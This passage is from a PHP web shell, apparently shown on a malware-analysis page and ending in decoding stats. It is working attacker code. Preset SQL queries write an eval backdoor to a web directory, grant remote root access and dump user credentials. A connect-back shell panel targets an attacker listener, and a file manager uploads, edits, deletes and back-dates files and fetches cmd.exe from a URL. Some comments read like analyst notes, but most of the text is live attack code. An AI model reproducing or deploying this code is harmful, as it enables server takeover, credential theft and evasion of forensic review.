'.$names,$conn);$spidercode = 'select '.$array[3][0].' from `'.$array[2][0].'`;';$result = mysql_query($spidercode,$conn);if($result) {while($row = mysql_fetch_array($result,MYSQL_ASSOC)) { $data .= join('{~}',$row)."\r\n"; $i++; }if($data) {$file = strdir($array[4][0]);$msg .= filew($file,$data,'w') ? 
'<h2> - </h2>' : '<h1> - </h1>';$rows = array('file' => $file,size(filesize($file)) => ''.$i.'');}else { $msg .= '<h1> - </h1>'; }}else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}else { $msg .= '<h1> - </h1>'; }} elseif(!empty($sqlcode)) {mysql_select_db($sqlname,$conn);mysql_query('set names '.$names,$conn);$result = mysql_query($sqlcode,$conn);if($result) { $msg .= '<h2> - SQL</h2>'; while($array = mysql_fetch_array($result,MYSQL_ASSOC)) { $rows[] = $array; } }else { $msg .= '<h1> - SQL</h1>'; $rows = array('errno' => mysql_errno(),'error' => mysql_error()); }}mysql_free_result($result);} else {$msg = '<h1>'.$type.'</h1>';$rows = array('errno' => mysql_errno(),'error' => mysql_error());}mysql_close($conn);} else {$msg = '<h1>'.$type.'</h1>';}break;}} else {$type = 'MySql';$sqlhost = 'localhost:3306';$sqluser = 'root';$sqlpass = '123456';$sqlname = 'mysql';$sqlcode = 'select version();';$names = 'gbk';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="sql">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td>';$dbs = array('MySql','MsSql','Oracle','PostgreSql');foreach($dbs as $dbname) { echo '<label><input type="radio" name="type" value="'.$dbname.'"'.($type == $dbname ? 
' checked' : '').'>'.$dbname.'</label> '; }echo '</td></tr><tr><td></td><td> <input type="text" name="sqlhost" style="width:188px;" value="'.$sqlhost.'"> ';echo ' <input type="text" name="sqluser" style="width:108px;" value="'.$sqluser.'"> ';echo ' <input type="text" name="sqlpass" style="width:108px;" value="'.$sqlpass.'"> ';echo ' <input type="text" name="sqlname" style="width:108px;" value="'.$sqlname.'"></td></tr>';echo '<tr><td><br>';echo '<select onchange="$(\'sqlcode\').value=options[selectedIndex].value">';echo '<option value="select version();">------</option>';echo '<option value="select \'<?php eval ($_POST[cmd]);?>\' into outfile \'D:/web/shell.php\';"></option>';echo '<option value="GRANT ALL PRIVILEGES ON *.* TO \''.$sqluser.'\'@\'%\' IDENTIFIED BY \''.$sqlpass.'\' WITH GRANT OPTION;"></option>';echo '<option value="show variables;"></option>';echo '<option value="create database t00ls;"></option>';echo '<option value="create table `t00ls` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;"></option>';echo '<option value="show databases;"></option>';echo '<option value="show tables from `'.$sqlname.'`;"></option>';echo '<option value="show columns from `'.$sqlname.'`;"></option>';echo '<option value="drop table `t00ls`;"></option>';echo '<option value="select * from `pre_ucenter_members` limit 0,30;"></option>';echo '<option value="insert into `admin` (`user`,`pass`) values (\'t00ls\', \'f1a81d782dea6a19bdca383bffe68452\');"></option>';echo '<option value="update `admin` set `user` = \'t00ls1\',`pass` = \'50de237e389600acadbeda3d6e6e0b1f\' where `user` = \'t00ls\' and `pass` = \'f1a81d782dea6a19bdca383bffe68452\' limit 1;"></option>';echo '<option value="t00lsa \'discuzx25\' t00lsb \'pre_ucenter_members\' t00lsc \'username,password,salt,email\' t00lsfile \''.THISDIR.'out.txt\';">(MySql)</option>';echo '</select>';echo '</td><td><textarea name="sqlcode" id="sqlcode" 
style="width:680px;height:80px;">'.htmlspecialchars($sqlcode).'</textarea></td></tr>';echo '<tr><td></td><td><select name="names">';$charsets = array('gbk','utf8','big5','latin1','cp866','ujis','euckr','koi8r','koi8u');foreach($charsets as $charset) { echo '<option value="'.$charset.'"'.($names == $charset ? ' selected' : '').'>'.$charset.'</option>'; }echo '</select> <input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';if($rows) {echo '<pre style="padding:5px;background:#F8F8F8;text-align:left;">';ob_start();print_r($rows);$out = ob_get_contents();ob_end_clean();if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$out) && function_exists('iconv')) { $out = @iconv('UTF-8','GBK',$out); }echo htmlspecialchars($out);echo '</pre>';}break;/* backshell panel: passes $_POST backip, backport, temp and type to backshell(), defined outside this excerpt. Form defaults are the client's REMOTE_ADDR, port 4444 and /tmp; the UI hint (nc -vvlp) suggests a connect-back to a listener, so outbound connections from the web server process are the network-side signal to look for - confirm against backshell(). */case "backshell" : if((!empty($_POST['backip'])) && (!empty($_POST['backport']))) {$backip = $_POST['backip'];$backport = $_POST['backport'];$temp = $_POST['temp'] ? $_POST['temp'] : '/tmp';$type = $_POST['type'];$msg = backshell($backip,$backport,$temp,$type);} else {$backip = $_SERVER['REMOTE_ADDR'] ? 
$_SERVER['REMOTE_ADDR'] : getenv('REMOTE_ADDR');$backport = '4444';$temp = '/tmp';$type = 'pl';}echo '<div class="msgbox">'.$msg.'</div>';echo '<form method="POST">';subeval();echo '<input type="hidden" name="go" id="go" value="backshell">';echo '<table class="tables"><tr><th style="width:15%;"></th><th></th></tr>';echo '<tr><td></td><td><input type="text" name="backip" style="width:268px;" value="'.$backip.'"> (Your ip)</td></tr>';echo '<tr><td></td><td><input type="text" name="backport" style="width:268px;" value="'.$backport.'"> (nc -vvlp '.$backport.')</td></tr>';echo '<tr><td></td><td><input type="text" name="temp" style="width:268px;" value="'.$temp.'"> (Only Linux)</td></tr>';echo '<tr><td></td><td>';$types = array('pl' => 'Perl','py' => 'Python','cbin' => 'C-Bin','php' => 'PHP','phpwin' => 'WIN-PHP');foreach($types as $key => $name) { echo '<label><input type="radio" name="type" value="'.$key.'"'.($key == $type ? ' checked' : '').'>'.$name.'</label> '; }echo '</td></tr><tr><td></td><td><input type="submit" style="width:80px;" value=""></td></tr>';echo '</table></form>';break;/* edit and editor panel: loads the file named by godir + govar with filer() into a textarea; saving goes through act=edit in the default branch, which writes $_POST['filecode'] to $_POST['filename']. */case "edit" : case "editor" : $file = strdir($_POST['godir'].'/'.$_POST['govar']);if(!file_exists($file)) {$msg = '';} else {$code = filer($file);$chst = '';if(preg_match('~[\x{4e00}-\x{9fa5}]+~u',$code)) { $chst = 'utf-8'; }$size = size(filesize($file));$msg = ' '.substr(decoct(fileperms($file)),-4).'  '.$size.'  
'.$chst.'';}echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==');echo '<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="IE" onclick="search($(\'keyword\').value);"> - '.$msg.'</div>';echo '<form name="editfrm" id="editfrm" method="POST">';subeval();echo '<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">';echo '<input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';echo '<div class="actall"> <input type="text" name="filename" value="'.$file.'" style="width:662px;"> ';echo '</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">'.htmlspecialchars($code).'</textarea></div></form>';echo '<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\'editfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.dirname($file).'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;/* upfiles panel: multi-file upload into $_POST['updir'] (or godir); slots 1 to 9 are processed and each file may be renamed through renames[]. fileu() falls back to copy() when move_uploaded_file() fails. */case "upfiles" : $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir'];$msg = ' '.get_cfg_var("upload_max_filesize").' 
POST '.get_cfg_var("post_max_size").'';$max = 10;if(isset($_FILES['uploads']) && isset($_POST['renames'])) {$uploads = $_FILES['uploads'];$msgs = array();for($i = 1;$i < $max;$i++) {if($uploads['error'][$i] == UPLOAD_ERR_OK) {$rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i];$filea = $uploads['tmp_name'][$i];$fileb = strdir($updir.'/'.$rename);$msgs[$i] = fileu($filea,$fileb) ? '<br><h2> '.$rename.'</h2>' : '<br><h1> '.$rename.'</h1>';}}}echo '<div class="msgbox">'.$msg.'</div>';echo '<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">';echo '<div class="actall"><p> <input type="text" name="updir" style="width:398px;" value="'.$updir.'"></p>';for($i = 1;$i < $max;$i++) { echo '<p>'.$i.' <input type="file" name="uploads['.$i.']" style="width:300px;">  <input type="text" name="renames['.$i.']" style="width:128px;"> '.$msgs[$i].'</p>'; }echo '</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\'upsfrm\').submit();" value="" style="width:80px;"> ';echo '<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="'.$updir.'">';subeval();echo '<input type="button" onclick="$(\'backfrm\').submit();" value="" style="width:80px;"></form></div>';break;/* default branch: file manager. Handles a single upload, then dispatches on $_POST['act'], then lists $nowdir with per-entry links. */default : if(isset($_FILES['upfile'])) {if($_FILES['upfile']['name'] == '') { $msg = '<h1></h1>'; }else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir.$rename); $msg = fileu($filea,$fileb) ? 
'<h2>'.$rename.'</h2>' : '<h1>'.$rename.'</h1>'; }}if(isset($_POST['act'])) {switch($_POST['act']) {/* act codes: a copy selected files, b unlink, c chmod (validated with ereg(), removed in PHP 7), d touch to a supplied date, which rewrites modification times and makes mtime unreliable as forensic evidence for files under this directory, e mkdir 0777, f fetch a URL with file_get_contents() and save it, rf rename, pd chmod one entry, edit write file, deltree recursive delete through deltree(). */case "a" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @copy(strdir($nowdir.$file),strdir($_POST['var'].'/'.$file)) ? 1 : 0; } $msg =  $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "b" : if(!$_POST['files']) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @unlink(strdir($nowdir.$file)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' </h2>' : '<h1> '.$i.' </h1>'; }break;case "c" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!ereg("^[0-7]{4}$",$_POST['var'])) { $msg = '<h1></h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @chmod(strdir($nowdir.$file),base_convert($_POST['var'],8,10)) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "d" : if(!$_POST['files']) { $msg = '<h1> '.$_POST['var'].'</h1>'; }elseif(!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/',$_POST['var'])) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $i = 0; foreach($_POST['files'] as $file) { $i += @touch(strdir($nowdir.$file),strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '<h2> '.$i.' '.$_POST['var'].'</h2>' : '<h1> '.$i.' '.$_POST['var'].'</h1>'; }break;case "e" : $path = strdir($nowdir.$_POST['var'].'/');if(file_exists($path)) { $msg = '<h1> '.$_POST['var'].'</h1>'; }else { $msg = @mkdir($path,0777) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;case "f" : $context = array('http' => array('timeout' => 30));if(function_exists('stream_context_create')) { $stream = stream_context_create($context); }$data = @file_get_contents ($_POST['var'],false,$stream);$file = array_pop(explode('/',$_POST['var']));if($data) { $msg = filew(strdir($nowdir.$file),$data,'wb') ? '<h2> '.$file.' </h2>' : '<h1> '.$file.' 
</h1>'; } else { $msg = '<h1></h1>'; }break;case "rf" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $msg = @rename(strdir($nowdir.$files[1]),strdir($nowdir.$files[0])) ? '<h2> '.$files[1].'  '.$files[0].' </h2>' : '<h1> '.$files[1].'  '.$files[0].' </h1>'; }break;case "pd" : $files = explode('|x|',$_POST['var']);if(count($files) != 2) { $msg = '<h1></h1>'; }else { $path = strdir($nowdir.$files[1]); $msg = @chmod($path,base_convert($files[0],8,10)) ? '<h2>'.$files[1].''.$files[0].'</h2>' : '<h1>'.$files[1].''.$files[0].'</h1>'; }break;case "edit" : if(isset($_POST['filename']) && isset($_POST['filecode'])) { $msg = filew($_POST['filename'],$_POST['filecode'],'w') ? '<h2> '.$_POST['filename'].'</h2>' : '<h1> '.$_POST['filename'].'</h1>'; }break;case "deltree" : $deldir = strdir($nowdir.$_POST['var'].'/');if(!file_exists($deldir)) { $msg = '<h1> '.$_POST['var'].' </h1>'; }else { $msg = deltree($deldir) ? '<h2> '.$_POST['var'].' </h2>' : '<h1> '.$_POST['var'].' </h1>'; }break;}}$chmod = substr(decoct(fileperms($nowdir)),-4);if(!$chmod) { $msg .= ' - <h1></h1>'; }$array = showdir($nowdir);$thisurl = strdir('/'.strtr($nowdir,array(ROOTDIR => '')).'/');$nowdir = strtr($nowdir,array('\'' => '%27','"' => '%22'));echo '<div class="msgbox">'.$msg.'</div>';echo '<div class="actall"><form name="frm" id="frm" method="POST">';subeval();echo (is_writable($nowdir) ? '<h2></h2>' : '<h1></h1>').' 
<input type="text" name="dir" id="dir" style="width:508px;" value="'.strdir($nowdir.'/').'"> ';echo '<input type="button" onclick="$(\'frm\').submit();" style="width:50px;" value=""> ';echo '<input type="button" onclick="cd(\''.ROOTDIR.'\');" style="width:68px;" value=""> ';echo '<input type="button" onclick="cd(\''.THISDIR.'\');" style="width:68px;" value=""> ';echo '<select onchange="cd(options[selectedIndex].value);">';echo '<option>------</option>';echo '<option value="C:/RECYCLER/">Win-RECYCLER</option>';echo '<option value="C:/$Recycle.Bin/">Win-$Recycle</option>';echo '<option value="C:/Program Files/">Win-Program</option>';echo '<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>';echo '<option value="C:/Documents and Settings/All Users////">Win-</option>';echo '<option value="C:/Windows/Temp/">Win-TEMP</option>';echo '<option value="/usr/local/">Linux-local</option>';echo '<option value="/tmp/">Linux-tmp</option>';echo '<option value="/var/tmp/">Linux-var</option>';echo '<option value="/etc/ssh/">Linux-ssh</option>';echo '</select></form></div><div class="actall">';echo '<input type="button" value="" onclick="nf(\'edit\',\'newfile.php\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'newdir\',\'e\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="txts(\'\',\'http://www.baidu.com/cmd.exe\',\'f\');" style="width:68px;"> ';echo '<input type="button" value="" onclick="go(\'upfiles\',\''.$nowdir.'\');" style="width:68px;"> ';echo '<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="file" name="upfile" style="width:286px;height:21px;"> ';echo '<input type="button" onclick="$(\'upfrm\').submit();" value="" style="width:50px;"> ';echo ' <input type="text" name="rename" style="width:128px;">';echo '</form></div>';echo '<form name="frm1" 
id="frm1" method="POST"><table class="tables">';subeval();echo '<input type="hidden" name="dir" id="dir" value="'.$nowdir.'">';echo '<input type="hidden" name="act" id="act" value="">';echo '<input type="hidden" name="var" id="var" value="">';echo '<th><a href="javascript:cd(\''.dirname($nowdir).'/\');"></a></th><th style="width:8%"></th><th style="width:5%"></th><th style="width:17%"></th><th style="width:17%"></th><th style="width:8%"></th>';if($array) {asort($array['dir']);asort($array['file']);$dnum = $fnum = 0;foreach($array['dir'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));echo '<tr>';echo '<td><a href="javascript:cd(\''.$nowdir.$name.'\');"><b>'.strtr($name,array('%27' => '\'','%22' => '"')).'</b></a></td>';echo '<td><a href="javascript:dels(\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td>-</td>';echo '</tr>';$dnum++;}foreach($array['file'] as $path => $name) {$prem = substr(decoct(fileperms($path)),-4);$ctime = date('Y-m-d H:i:s',filectime($path));$mtime = date('Y-m-d H:i:s',filemtime($path));$size = size(filesize($path));echo '<tr>';echo '<td><input type="checkbox" name="files[]" value="'.$name.'"><a target="_blank" href="'.$thisurl.$name.'">'.strtr($name,array('%27' => '\'','%22' => '"')).'</a></td>';echo '<td><a href="javascript:go(\'edit\',\''.$name.'\');"></a> ';echo '<a href="javascript:acts(\''.$name.'\',\'rf\',\''.$name.'\');"></a></td>';echo '<td><a href="javascript:acts(\''.$prem.'\',\'pd\',\''.$name.'\');">'.$prem.'</a></td>';echo '<td>'.$ctime.'</td>';echo '<td>'.$mtime.'</td>';echo '<td align="right"><a href="javascript:go(\'down\',\''.$name.'\');">'.$size.'</a></td>';echo '</tr>';$fnum++;}}unset($array);echo '</table>';echo 
'<div class="actall" style="text-align:left;">';echo '<input type="checkbox" id="chkall" name="chkall" value="on" onclick="sa(this.form);"> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$nowdir.'","a");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'dels("b");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","0666","c");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.$mtime.'","d");\'> ';echo '<input type="button" value="" style="width:50px;" onclick=\'txts("","'.strtr($_SERVER['HTTP_HOST'],array(':' => '_','.' => '_')).'.zip","p");\'> ';echo '['.$dnum.'] - ['.$fnum.'] - ['.$chmod.']</div></form>';break;}?><div class="footag"><?php echo php_uname().'<br>'.$_SERVER['SERVER_SOFTWARE'];?></div></div></div></body></html><?php unset($array);exit;?>

Function Calls

None

Variables

None

Stats

MD5 97bc6ffec32d9a9c98d674d257251a1e
Eval Count 0
Decode Time 380 ms